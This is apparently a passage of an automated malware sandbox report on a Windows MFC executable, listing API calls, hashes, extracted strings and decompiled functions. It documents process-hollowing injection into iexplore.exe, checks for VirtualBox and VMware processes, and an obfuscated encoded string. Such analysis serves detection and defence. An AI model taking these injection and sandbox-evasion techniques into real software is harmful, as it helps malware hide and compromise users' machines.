    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 023726FA
    • GetThreadContext.KERNELBASE(?,?), ref: 0237271C
    • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 02372735
    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02372744
    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02372753
    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02372774
    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02372780
    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 023727E5
    • VirtualAllocEx.KERNELBASE(?,?,00100000,00003000,00000040), ref: 02372813
    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 02372839
    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0237287A
    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 023728D7
    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 02372904
    • SetThreadContext.KERNELBASE(?,00010007), ref: 02372920
    • ResumeThread.KERNELBASE(?), ref: 02372E05
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02372EEB
    • TerminateProcess.KERNELBASE(00000000), ref: 02372F11
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000002,00000000,00000000), ref: 0237305F
    • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 0237307F
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0237309A
    • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000005,00000000,00000000), ref: 023730B7
    • FindCloseChangeNotification.KERNELBASE(40000000), ref: 023730C9
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02373157
    • Process32First.KERNEL32(000000FF,00000128), ref: 023731BB
    • Process32Next.KERNEL32(000000FF,00000128), ref: 023731CF
    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0237320A
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0237333B
    • CreateFileA.KERNELBASE(?,00000000,00000002,00000000,00000003,00000000,00000000), ref: 02373359
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023733A2
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023733D6
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02373464
    • VirtualAlloc.KERNELBASE(00000000,-000003F7,00003000,00000040), ref: 02373487
    • ReadFile.KERNELBASE(?,00000000,00000000), ref: 023734A3
    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 023734FC
    • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 023735B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.333656848.0000000002370000.00000040.00000001.sdmp, Offset: 02370000, based on PE: false
    Similarity
    • API ID: Create$File$Process$MemoryVirtual$AllocSectionUnmapViewWrite$ChangeCloseFindNotificationThread$ContextProcess32Read$FirstLibraryLoadNextResumeSnapshotTerminateToolhelp32
    • String ID: $ $ $"$'$($.ofg$/$0$0$2$2$5$5$7$7$<$<$<$>$>$>$AllocateAndInitializeSid$C$CloseHandle$CopyFileW$CreateDirectoryW$CreateFileA$CreateFileW$CreateMutexA$CreateProcessA$CreateProcessW$CreateToolhelp32Snapshot$D$D$DeleteFileW$DuplicateHandle$E$EqualSid$ExitProcess$F$GetCommandLineW$GetCurrentProcess$GetFileSize$GetFileTime$GetModuleFileNameA$GetModuleFileNameW$GetModuleHandleA$GetProcAddress$GetProcessMemoryInfo$GetSystemDirectoryA$GetSystemDirectoryW$GetThreadContext$GetTickCount$GetTokenInformation$GlobalAlloc$I$I$IsWow64Process$L$L$LookupAccountSidA$M$M$Module32First$Module32Next$MoveFileExW$N$NtReadVirtualMemory$NtUnmapViewOfSection$OpenMutexA$OpenProcess$OpenProcessToken$P$Process32First$Process32Next$Program Files (x86)\Internet Explorer\iexplore.exe$ReadFile$RegCloseKey$RegOpenKeyExA$RegOpenKeyExW$RegQueryValueExA$RegQueryValueExW$RegSetValueExA$RegSetValueExW$ResumeThread$S$S$S$SHGetSpecialFolderPathW$SetFileAttributesW$SetFileTime$SetThreadContext$Sleep$SuspendThread$System.ni.dll$T$TerminateProcess$UACMut$VBoxService.exe$VirtualAlloc$VirtualAllocEx$WriteFile$WriteProcessMemory$X$\$\$\$\$\SD_$_$_$_$a$a$a$a$a$advapi32.dll$c$c$c$c$c$d$d$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$k$kernel32.dll$l$l$l$m$m$m$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$p$p$p$p$p$p$p$psapi.dll$r$r$r$r$r$r$s$s$s$s$s$s$s$s$shell32.dll$t$t$t$t$t$t$t$t$t$u$u$u$v$v$vmtoolsd.exe$w$x$x$x$x
    • API String ID: 4111043871-3324414064
    • Opcode ID: 1585ecd3ea26a12c16edd39c8d3e235753ff999a28be0f02d076e5741ad70579
    • Instruction ID: 750962d519b66b3f5dd1b163bf16eb5787279d0e79d5e475cac999297762e93a
    • Opcode Fuzzy Hash: 1585ecd3ea26a12c16edd39c8d3e235753ff999a28be0f02d076e5741ad70579
    • Instruction Fuzzy Hash: FC83DD61C086ECD9EF22C664CC487DEBFB95F16709F0440D9D18C66282C7BA5B98CF66
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #4710.MFC42(?,?,?,?,00402778,000000FF), ref: 00401851
    • GetSystemMenu.USER32(?,00000000,?,?,?,?,00402778,000000FF), ref: 00401862
    • #2863.MFC42(00000000,?,?,?,?,00402778,000000FF), ref: 00401869
    • #540.MFC42 ref: 00401887
    • #4160.MFC42(00000065), ref: 0040189B
    • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004018C6
    • AppendMenuA.USER32(?,00000000,00000010,?), ref: 004018ED
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040192C
    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00401948
    • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401995
    • SendMessageA.USER32(?,00000080,00000000,?), ref: 004019D1
    • #922.MFC42(?,00407100,004070FC,004070F8,004070F4), ref: 004019F7
    • #922.MFC42(?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A23
    • #922.MFC42(?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A4C
    • #6877.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A7F
    • #540.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401ADF
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: #922Menu$#540AppendFileMessageSend$#2863#4160#4710#6877CreateModuleNameSystem
    • String ID:
    • API String ID: 96702024-0
    • Opcode ID: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
    • Instruction ID: 034d14d88cb055e6d472a40f8ec74e841bbf8644bf1d44e9418bb8139dfff1ff
    • Opcode Fuzzy Hash: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
    • Instruction Fuzzy Hash: 37812975A00218ABDB20DB54CD85BDAB7B4BB08700F1482EEE519772D1CBB96F85CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			_entry_(void* __ebx, void* __edi, void* __esi) {
    				CHAR* _v8;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				struct _STARTUPINFOA _v96;
    				int _v100;
    				char** _v104;
    				int _v108;
    				void _v112;
    				char _v116;
    				intOrPtr* _v120;
    				intOrPtr _v124;
    				void* _t27;
    				intOrPtr _t36;
    				signed int _t38;
    				int _t40;
    				intOrPtr* _t41;
    				intOrPtr _t42;
    				intOrPtr _t49;
    				intOrPtr* _t55;
    				intOrPtr _t58;
    
    				_push(0xffffffff);
    				_push(0x403770);
    				_push(0x402612);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t58;
    				_v28 = _t58 - 0x68;
    				_v8 = 0;
    				__set_app_type(2);
    				 *0x407128 =  *0x407128 | 0xffffffff;
    				 *0x40712c =  *0x40712c | 0xffffffff;
    				 *(__p__fmode()) =  *0x40711c;
    				 *(__p__commode()) =  *0x407118;
    				 *0x407124 = _adjust_fdiv;
    				_t27 = E00402611( *_adjust_fdiv);
    				if( *0x406fd0 == 0) {
    					__setusermatherr(E0040260E);
    				}
    				E004025FC(_t27);
    				_push(0x405028);
    				_push(0x405024);
    				L004025F6();
    				_v112 =  *0x407114;
    				_t6 =  &_v116; // 0x405028
    				__getmainargs( &_v100, _t6,  &_v104,  *0x407110,  &_v112);
    				_push(0x405020);
    				_push(0x405000); // executed
    				L004025F6(); // executed
    				_t55 =  *_acmdln;
    				_v120 = _t55;
    				if( *_t55 != 0x22) {
    					while( *_t55 > 0x20) {
    						_t55 = _t55 + 1;
    						_v120 = _t55;
    					}
    				} else {
    					do {
    						_t55 = _t55 + 1;
    						_v120 = _t55;
    						_t42 =  *_t55;
    					} while (_t42 != 0 && _t42 != 0x22);
    					if( *_t55 == 0x22) {
    						L6:
    						_t55 = _t55 + 1;
    						_v120 = _t55;
    					}
    				}
    				_t36 =  *_t55;
    				if(_t36 != 0 && _t36 <= 0x20) {
    					goto L6;
    				}
    				_v96.dwFlags = 0;
    				GetStartupInfoA( &_v96);
    				if((_v96.dwFlags & 0x00000001) == 0) {
    					_t38 = 0xa;
    				} else {
    					_t38 = _v96.wShowWindow & 0x0000ffff;
    				}
    				_t40 = E00402624(GetModuleHandleA(0), _t39, 0, _t55, _t38);
    				_v108 = _t40;
    				exit(_t40);
    				_t41 = _v24;
    				_t49 =  *((intOrPtr*)( *_t41));
    				_v124 = _t49;
    				_push(_t41);
    				_push(_t49);
    				L004025F0();
    				return _t41;
    			}
























    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
    • String ID: (P@
    • API String ID: 801014965-91804302
    • Opcode ID: 27f86d6643a1254b99d707d69796055d6d9f1b2c58ade87e966f82bbe79c0aaa
    • Instruction ID: 17517763960c9d08206b2b8dd168876b2a812f0bf5aabc2cbc39559012d1f467
    • Opcode Fuzzy Hash: 27f86d6643a1254b99d707d69796055d6d9f1b2c58ade87e966f82bbe79c0aaa
    • Instruction Fuzzy Hash: AB418BB1804308AFDB209FA4DE49AAABBB8FB09710F20057FE451B72D1C6B85941DB59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #4710.MFC42(?,?,?,?,00402778,000000FF), ref: 00401851
    • #2863.MFC42(00000000,?,?,?,?,00402778,000000FF), ref: 00401869
    • #540.MFC42 ref: 00401887
    • #4160.MFC42(00000065), ref: 0040189B
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040192C
    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00401948
    • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401995
    • SendMessageA.USER32(?,00000080,00000000,?), ref: 004019D1
    • #922.MFC42(?,00407100,004070FC,004070F8,004070F4), ref: 004019F7
    • #922.MFC42(?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A23
    • #922.MFC42(?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A4C
    • #6877.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A7F
    • #540.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401ADF
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #922$#540FileMessageSend$#2863#4160#4710#6877CreateModuleName
    • String ID:
    • API String ID: 3777263574-0
    • Opcode ID: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
    • Instruction ID: 034d14d88cb055e6d472a40f8ec74e841bbf8644bf1d44e9418bb8139dfff1ff
    • Opcode Fuzzy Hash: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
    • Instruction Fuzzy Hash: 37812975A00218ABDB20DB54CD85BDAB7B4BB08700F1482EEE519772D1CBB96F85CF58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #1205.MFC42 ref: 004013F7
    • #1199.MFC42(00000064,00000000,000000FF), ref: 00401406
    • #1134.MFC42(00000000), ref: 00401414
    • #2621.MFC42 ref: 00401422
    • #5717.MFC42 ref: 0040142D
    • #5716.MFC42 ref: 0040143C
    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000000), ref: 0040149E
    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 004014BA
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$#1134#1199#1205#2621#5716#5717CreateModuleName
    • String ID:
    • API String ID: 3187058082-0
    • Opcode ID: 824f2d215b699af46ae784ad8cd60a46cc537455c8978a2aae81c9de020a38b0
    • Instruction ID: 9b55a2ef3098a90591ddc17978d9381f7210454ca7d382de3417788a3121f65a
    • Opcode Fuzzy Hash: 824f2d215b699af46ae784ad8cd60a46cc537455c8978a2aae81c9de020a38b0
    • Instruction Fuzzy Hash: A931B634941219ABDB60EFA1CD4AB99B374AF40714F2042BEE505B72E1DFB85A408B59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #1576.MFC42(?,?,?,D%@,00402544,00000000,?,0000000A), ref: 00402634
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #1576
    • String ID: D%@
    • API String ID: 1976119259-385707385
    • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
    • Instruction ID: 50b4a7b3333f08eeb35bf7ae67fd2578e4549a5775935e3edfc97eadc187546c
    • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
    • Instruction Fuzzy Hash: 1EB00876018386ABCB02DE919905E2ABAA2BF98304F484C1EB2A1110A187668428AB56
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #537.MFC42(Mc645M8161C645826cC6458341MC6M45MMMM846CC645856CMC645MM86M6Fc645M87M63M88MM5D88c6458C47MC6M45M8D65C645M8e74C645M8F46Mc6M459069c645M916cMC645MM9265MMC6M4593M53C645MMMMMMM9469C6M45957AMC6MM4596M65885DM97C645c852C645MC965c645CA61MC6M45CB64MC6M45ccM46C645cd69C645M,004016D5), ref: 004016EA
    Strings
    • Mc645M8161C645826cC6458341MC6M45MMMM846CC645856CMC645MM86M6Fc645M87M63M88MM5D88c6458C47MC6M45M8D65C645M8e74C645M8F46Mc6M459069c645M916cMC645MM9265MMC6M4593M53C645MMMMMMM9469C6M45957AMC6MM4596M65885DM97C645c852C645MC965c645CA61MC6M45CB64MC6M45ccM46C645cd69C645M, xrefs: 004016E0
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: #537
    • String ID: Mc645M8161C645826cC6458341MC6M45MMMM846CC645856CMC645MM86M6Fc645M87M63M88MM5D88c6458C47MC6M45M8D65C645M8e74C645M8F46Mc6M459069c645M916cMC645MM9265MMC6M4593M53C645MMMMMMM9469C6M45957AMC6MM4596M65885DM97C645c852C645MC965c645CA61MC6M45CB64MC6M45ccM46C645cd69C645M
    • API String ID: 4256512136-1661908015
    • Opcode ID: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
    • Instruction ID: f17563fe98301e3d8e0c295bdb303cc1729dbef747dfec38baf0000a63f77f41
    • Opcode Fuzzy Hash: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: __dllonexit_onexit
    • String ID:
    • API String ID: 2384194067-0
    • Opcode ID: 99111255a49266e4836be7d03c5a90fdce03ba57334792b5bc64e4e4d725839c
    • Instruction ID: 3033bbb125f2c932eb7164596f2ee8a61ab74c6cfaf0af607cc99a6c82457121
    • Opcode Fuzzy Hash: 99111255a49266e4836be7d03c5a90fdce03ba57334792b5bc64e4e4d725839c
    • Instruction Fuzzy Hash: 66C01270848300BACB012F21BE0E5597B51EB99732B64867AF265342F0977D2635AA4F
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #537.MFC42(00405D08,004016D5), ref: 004016EA
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #537
    • String ID:
    • API String ID: 4256512136-0
    • Opcode ID: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
    • Instruction ID: f17563fe98301e3d8e0c295bdb303cc1729dbef747dfec38baf0000a63f77f41
    • Opcode Fuzzy Hash: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • MapViewOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040116A
    • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401178
    • FindFirstFileA.KERNEL32(00000000,00000000), ref: 00401182
    • MessageBoxIndirectA.USER32(00000000), ref: 0040118A
    • RegDeleteKeyW.ADVAPI32(00000000,00000000), ref: 00401194
    • GetCharABCWidthsFloatA.GDI32(00000000,00000000,00000000,00000000), ref: 004011A2
    • FindNextFileW.KERNEL32(00000000,00000000), ref: 004011AC
    • EnableWindow.USER32(00000000,00000000), ref: 004011B6
    • GetTimeZoneInformation.KERNEL32(00000000), ref: 004011BE
    • ExitProcess.KERNEL32 ref: 004011C6
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Find$CharDeleteEnableExitFirstFloatIndirectInfoInformationLocaleMessageNextProcessTimeViewWidthsWindowZone
    • String ID:
    • API String ID: 387652844-0
    • Opcode ID: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
    • Instruction ID: 8c51f5a217cead61b05c59c05cd421a87c6b17fff41cd05f571255464dbde35c
    • Opcode Fuzzy Hash: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
    • Instruction Fuzzy Hash: 67F052353C5240B6F2602FD15E0BB597E286745B07F144054B30A680E445A06645562E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp
    Similarity
    • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
    • String ID:
    • API String ID: 1397574227-0
    • Opcode ID: 53fa7488a5a854440a1a23aa09015ff2bc1e6540da60ae6e80a7e7109753014d
    • Instruction ID: 6b7cf9a39df90bf87ff92fcd612bba58bd57baa984f1b891e9a4c2e5792cc22d
    • Opcode Fuzzy Hash: 53fa7488a5a854440a1a23aa09015ff2bc1e6540da60ae6e80a7e7109753014d
    • Instruction Fuzzy Hash: 65312C75D00119DFDB24DFB8CA89AAEBBB4BF48300F1081ADE545A7291DA74A941CF54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • MapViewOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040116A
    • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401178
    • FindFirstFileA.KERNEL32(00000000,00000000), ref: 00401182
    • RegDeleteKeyW.ADVAPI32(00000000,00000000), ref: 00401194
    • GetCharABCWidthsFloatA.GDI32(00000000,00000000,00000000,00000000), ref: 004011A2
    • FindNextFileW.KERNEL32(00000000,00000000), ref: 004011AC
    • GetTimeZoneInformation.KERNEL32(00000000), ref: 004011BE
    • ExitProcess.KERNEL32 ref: 004011C6
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Find$CharDeleteExitFirstFloatInfoInformationLocaleNextProcessTimeViewWidthsZone
    • String ID:
    • API String ID: 3462356098-0
    • Opcode ID: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
    • Instruction ID: 8c51f5a217cead61b05c59c05cd421a87c6b17fff41cd05f571255464dbde35c
    • Opcode Fuzzy Hash: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
    • Instruction Fuzzy Hash: 67F052353C5240B6F2602FD15E0BB597E286745B07F144054B30A680E445A06645562E
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.333656848.0000000002370000.00000040.00000001.sdmp, Offset: 02370000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
    • Instruction ID: a1b665580834cd89518532668ed95bd9805259c3d517e0d8267d00e32a7ec8f0
    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
    • Instruction Fuzzy Hash: 421152723401059FDB64DF59DCC1FA673EAEB89220B298095ED05CB315D679EC41DB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00401EA0(intOrPtr __ecx) {
    				char _v8;
    				intOrPtr _v16;
    				char _v32;
    				char _v48;
    				char _v56;
    				void* _v64;
    				char _v80;
    				char _v88;
    				char _v96;
    				char _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				char* _t55;
    				intOrPtr _t82;
    
    				 *[fs:0x0] = _t82;
    				_v116 = __ecx;
    				L00402404();
    				_v8 = 0;
    				L00402404();
    				_v8 = 1;
    				L004023FE();
    				_v8 = 2;
    				L004023F8();
    				_v8 = 3;
    				L004023F8();
    				_v8 = 4;
    				L004023F8();
    				_v8 = 5;
    				_v108 = E004012C0( &_v56);
    				L004023F2();
    				_v8 = 6;
    				L004023EC();
    				_v8 = 5;
    				L004023E6();
    				_v112 = E004012E0( &_v88,  &_v32,  &_v32,  &_v32,  &_v32);
    				L004023F2();
    				_v8 = 7;
    				L004023EC();
    				_v8 = 5;
    				L004023E6();
    				_v8 = 4;
    				L004023E6();
    				_v8 = 3;
    				L004023E6();
    				_v8 = 2;
    				L004023E6();
    				_v8 = 1;
    				__imp__#9( &_v32,  &_v104, _v112, 1,  &_v96, _v108, 1, 0x80020004, 0xa, 0, 2, 1, 2,  *[fs:0x0], E004027F8, 0xffffffff);
    				_v8 = 0;
    				_t55 =  &_v48;
    				__imp__#9(_t55);
    				_v8 = 0xffffffff;
    				__imp__#9( &_v80);
    				 *[fs:0x0] = _v16;
    				return _t55;
    			}

    APIs
    • #464.MFC42(00000001,00000002), ref: 00401EC5
    • #464.MFC42(00000000,00000002,00000001,00000002), ref: 00401ED8
    • #465.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401EEB
    • #434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401EF7
    • #434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F03
    • #434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F0F
      • Part of subcall function 004012C0: #4033.MFC42(?,00000006,00000002,00000009,00000000,00000000,?,00401F20,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004012CF
    • #433.MFC42(00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F2C
    • #839.MFC42(?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F3C
    • #5575.MFC42(?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F48
      • Part of subcall function 004012E0: #4033.MFC42(?,0000000E,00000001,00000009,00000002,0040520C,00000002,00000002,00000002,00000000,00401F65,?,?,?,?,?), ref: 00401305
    • #433.MFC42(00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F71
    • #839.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F81
    • #5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F8D
    • #5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F99
    • #5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401FA5
    • #5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401FB1
    • #9.OLEAUT32(?,?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001), ref: 00401FBE
    • #9.OLEAUT32(?), ref: 00401FCC
    • #9.OLEAUT32(?), ref: 00401FDD
    Memory Dump Source
    • Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #5575$#434$#4033#433#464#839$#465
    • String ID:
    • API String ID: 943837034-0
    • Opcode ID: 42dbcbc24b1c881d89f3986ed78658c36f544ed43673c517e1d6649f67c16f1a
    • Instruction ID: e863dd39016a29842b83eb9b3c7516125cf6d1dbde4ce8d12ad99f9311d01cf8
    • Opcode Fuzzy Hash: 42dbcbc24b1c881d89f3986ed78658c36f544ed43673c517e1d6649f67c16f1a
    • Instruction Fuzzy Hash: 23417430C05288EADB05DBE4DA9ABDDBB74AF20304F10816DE5127B1D2DBBC1B08DB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00402020(intOrPtr __ecx) {
    				char _v8;
    				intOrPtr _v16;
    				char _v32;
    				char _v36;
    				void* _v40;
    				char _v56;
    				void* _v64;
    				void* _v72;
    				char _v88;
    				intOrPtr _v92;
    				char* _t32;
    				intOrPtr _t49;
    
    				 *[fs:0x0] = _t49;
    				_v92 = __ecx;
    				L00402867();
    				L00402404();
    				_v8 = 0;
    				L00402404();
    				_v8 = 1;
    				L004023FE();
    				_v8 = 2;
    				L004023F8();
    				_v8 = 3;
    				L004023F8();
    				_v8 = 4;
    				L004023F8();
    				_v8 = 5;
    				L004023E6();
    				L004023E6();
    				_v36 = 1;
    				_v8 = 4;
    				L004023E6();
    				_v8 = 3;
    				L004023E6();
    				_v8 = 2;
    				L004023E6();
    				_v8 = 1;
    				_t32 =  &_v32;
    				__imp__#9(_t32, 0x80020004, 0xa, 0, 2, 1, 2,  *[fs:0x0], E00402846, 0xffffffff);
    				_v8 = 0;
    				__imp__#9( &_v56);
    				_v8 = 0xffffffff;
    				__imp__#9( &_v88);
    				 *[fs:0x0] = _v16;
    				return _t32;
    			}

    APIs
    • #1669.MFC42 ref: 00402041
    • #464.MFC42(00000001,00000002), ref: 0040204D
    • #464.MFC42(00000000,00000002,00000001,00000002), ref: 00402060
    • #465.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00402073
    • #434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 0040207F
    • #434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 0040208B
    • #434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00402097
    • #5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020A3
    • #5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020AB
